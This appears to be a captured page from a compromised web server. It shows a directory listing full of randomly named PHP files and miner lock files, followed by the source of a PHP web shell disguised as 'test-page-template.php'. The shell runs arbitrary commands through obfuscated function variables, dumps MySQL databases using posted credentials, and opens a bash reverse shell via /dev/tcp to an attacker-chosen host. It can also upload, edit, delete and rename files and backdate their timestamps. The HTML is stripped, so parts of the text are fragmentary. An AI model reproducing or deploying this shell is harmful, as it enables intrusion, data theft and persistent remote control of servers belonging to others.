File Manager

Files in the directory:

.cpuz.lock.miner.lock.mo-data.system-cache.tg_sent.well-known.wp-temp1.php2lVolXXEhi.php2x432ypmiz.php3hEqG72goy.php3mSEpP6VIC.php8IfeQl94wM.phpEEEfFASTTc.phpFmOGpeV0DN.phpGilY6RYYEN.phpJyi1kMmdR6.phpKSB7IxkEHR.phpZbZUDuV1li.phpb3f36GgqE6.phpc9NvS4Mcxk.phpdebug.logdefault-config.jsondsy7x4P69Z.phpe8dXYw87RY.phpedUM5QkpFX.phpfazemrx1949_3INrTabz.phpfazemrx1949_6ofLF0c6.phpfazemrx1949_Eg6uJOqH.phphAFGmIoRMm.phpi2I1MV1643.phpiU8nUnnh8L.phpknjidHu3VO.phplauncher.loglauncher.pylog.txtpayload.txtqF34a9c70O.phprobots.txtrun-launcher.phpsslauncher.pysslauncher.shtest-page-template.phptl4eCHbNH2.phptyasd.phpuAUSDSdrZ9.phpuploader2.phpwp-content

Upload a File

Edit File: test-page-template.php

'; } if (isset($_POST['fun'])) { echo '
';
                $a1($fun);
                echo '
'; } if (isset($_POST['DB'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $name = $_POST['name']; $port = $_POST['port']; $link = new mysqli($host, $user, $pass, $name, $port); if ($link->connect_error) { die("Database access is not available:
" . $link->connect_error); exit(); } else { $b2('mysqldump --port=' . $port . ' --user=' . $user . ' --password=' . $pass . ' --host=' . $host . ' ' . $name . ' > file.sql'); echo 'Dump completed!'; } } if (isset($_POST['submit'])) { $base64 = $_POST['base64']; $encode = $aTwo($base64); echo '

' . "Encode base64: " . '

' . $encode; } if (isset($_POST['submit2'])) { $base64_d = $_POST['base64']; $decode = $bTwo($base64_d); echo '

' . "Decode base64: " . '

' . htmlentities($decode); } if (isset($_POST['submit_u'])) { $url = $_POST['url']; $encode_u = urlencode($url); echo '

' . "Encode url: " . '

' . $encode_u; } if (isset($_POST['submit_u2'])) { $url_d = $_POST['url']; $decode_u = urldecode($url_d); echo '

' . "Decode url: " . '

' . htmlentities($decode_u); } if (isset($_POST['submit_hex'])) { $h = $_POST['hex']; $encode_hex = "0x" . bin2hex($h); echo '

' . "Encode HEX: " . '

' . $encode_hex; } if (isset($_POST['submit_hex2'])) { $h2 = $_POST['hex']; $decode_hex = hex2bin(substr($h2, 2)); echo '

' . "Decode HEX: " . '

' . htmlentities($decode_hex); } if (isset($_POST['reverse'])) { $back = explode("|", $_POST['host_']); $a1("bash -c 'bash -i &> /dev/tcp/$back[0]/$back[1] 0>&1'"); } $HTML2 = '
' . "" . '
Up one level Path:
'; echo $HTML2 . "
"; echo "" . "" . "" . "" . "" . "" . ""; $alldir = array(); $allfile = array(); $alllink = array(); while (false !== ($file = readdir($handle))) { if (is_link($path . '/' . $file)) { array_push($alllink, $file); } elseif (is_file($path . '/' . $file)) { array_push($allfile, $file); } elseif (is_dir($path . '/' . $file)) { array_push($alldir, $file); } } closedir($handle); } else { echo '
Can\'t open folder!

--> Go back <--
'; } sort($alldir); sort($allfile); sort($alllink); $allfiles = array_merge($alldir, $allfile, $alllink); foreach ($allfiles as $file) { if ($file != "." && $file != "..") { $fName = $file; $userinfo = posix_getpwuid(fileowner($file)) ["name"] . "/" . posix_getgrgid(filegroup($file)) ["name"]; if (strlen($path) == 1) { $file = $path . $file; } else { $file = $path . '/' . $file; } if (is_link($file)) { $disppath = readlink($file); if (strpos($disppath, "/") != 0) { $disppath = "/" . $disppath; } if (is_file(readlink($file))) { echo "" . "" . "" . "" . "" . ""; } else { echo "" . "" . "" . "" . "" . ""; } } elseif (is_file($file)) { $endsize = ""; $fullsize = filesize($file); if ($fullsize < 1024) { $endsize = "B"; } elseif ($fullsize < 1048576) { $endsize = "KB"; $fullsize/= 1024; } elseif ($fullsize < 1073741824) { $endsize = "MB"; $fullsize/= 1048576; } echo "" . "" . "" . "" . "" . ""; } elseif (is_dir($file)) { echo "" . "" . "" . "" . "" . ""; } } } echo "
" . "Name" . "" . "Action" . "" . "Permissions" . "" . "Owner/Group" . "" . "Modify" . "" . "Size" . "
" . "" . "➦" . "" . "" . "" . "" . "" . "" . "[" . numPerms($file) . "] " . printPerms($file) . "" . $userinfo . "" . date('d-m-Y H:i:s', filemtime($file)) . "LINK
" . "" . "$fName " . "" . "" . "" . "" . "[" . numPerms($file) . "] " . printPerms($file) . "" . $userinfo . "" . date('d-m-Y H:i:s', filemtime($file)) . "LINK
" . "" . " " . "" . "" . "" . "" . "" . "" . "" . "" . "[" . numPerms($file) . "] " . printPerms($file) . "" . $userinfo . "" . date('d-m-Y H:i:s', filemtime($file)) . "" . round($fullsize, 2) . " " . $endsize . "
" . "" . " $fName" . "" . "" . "" . "" . "" . "[" . numPerms($file) . "] " . printPerms($file) . "" . $userinfo . "" . date('d-m-Y H:i:s', filemtime($file)) . "DIR
"; } echo showContent($actpath); function removeDirectory($dir) { if ($objs = glob($dir . "/*")) { foreach ($objs as $obj) { is_dir($obj) ? removeDirectory($obj) : unlink($obj); } } return rmdir($dir); } $modal = '
'; if (isset($_POST['del'])) { if (!empty($_POST['choose'])) { foreach ($_POST['choose'] as $value) { if (is_link($value)) { if (unlink($value)) { echo str_replace("text", '

' . "The link was successfully deleted!" . '

', $modal); } else { echo str_replace("text", '

' . "Error! The link was not deleted!" . '

', $modal); } } elseif (is_file($value)) { if (unlink($value)) { echo str_replace("text", '

' . "The file was successfully deleted!" . '

', $modal); } else { echo str_replace("text", '

' . "Error! The file was not deleted!" . '

', $modal); } } elseif (is_dir($value)) { if (removeDirectory($value)) { echo str_replace("text", '

' . "Directory deleted!" . '

', $modal); } else { echo str_replace("text", '

' . "Error! The directory was not deleted!" . '

', $modal); } } } } } if (isset($_POST['edit'])) { if (!empty($_POST['choose'])) { $val = $_POST['choose'][0]; if (is_readable($val)) { $formedit = "
Close
"; echo $formedit; } else { echo str_replace("text", '

' . "Error! Can't open file!" . '

', $modal); } } } if (isset($_POST['edit_code'])) { $result = file_put_contents($_POST['correction'], $_POST['edit_code']); if ($result === FALSE) { echo str_replace("text", '

' . "Error writing to file!" . '

', $modal); } else { echo str_replace("text", '

' . "The file was successfully modified!" . '

', $modal); } } if (isset($_POST['view'])) { if (is_readable($_POST['view'])) { $doc = fopen($_POST['view'], "rt"); $contents = ''; while (!feof($doc)) $contents.= fread($doc, 4096); fclose($doc); if (filesize($_POST['view']) == 0) { echo str_replace("text", '

' . "The file is empty!" . '

', $modal); } elseif ($contents) { echo '
' . '
' . "
"; highlight_string($contents); echo "
" . 'Close' . "
" . "
"; } } else { echo str_replace("text", '

' . "Error! Can't open file!" . '

', $modal); } } if (isset($_POST['up']) && !empty($_POST['choose'])) { echo '
' . '" . "
"; } if ($_FILES['filename']['error'] == UPLOAD_ERR_OK) { $name = $_POST['up_file'] . '/' . $_FILES['filename']['name']; if (move_uploaded_file($_FILES['filename']['tmp_name'], $name)) { $text = '

' . "The file was uploaded successfully!" . '

'; $newphrase = str_replace("text", $text, $modal); echo $newphrase; } } else { echo str_replace("text", '

' . "Error! The file is not selected!" . '

', $modal); } if (isset($_POST['tou']) && !empty($_POST['choose'])) { echo '
' . '" . "
"; } if (isset($_POST['code'])) { if (touch($_POST['date_file'], strtotime($_POST['code']))) { $text = '

' . "Modification date changed!" . '

'; $newphrase = str_replace("text", $text, $modal); echo $newphrase; } else { echo str_replace("text", '

' . "Error! You couldn't change the date!" . '

', $modal); } } if (isset($_POST['ren']) && !empty($_POST['choose'])) { echo '
' . '" . "
"; } if (isset($_POST['r_code'])) { if (rename($_POST['ren_file'], $_POST['r_code'])) { echo str_replace("text", '

' . "Renaming completed!" . '

', $modal); } else { echo str_replace("text", '

' . "Error! Not renamed!" . '

', $modal); } } echo '
'; } else echo showForm(); ?> Download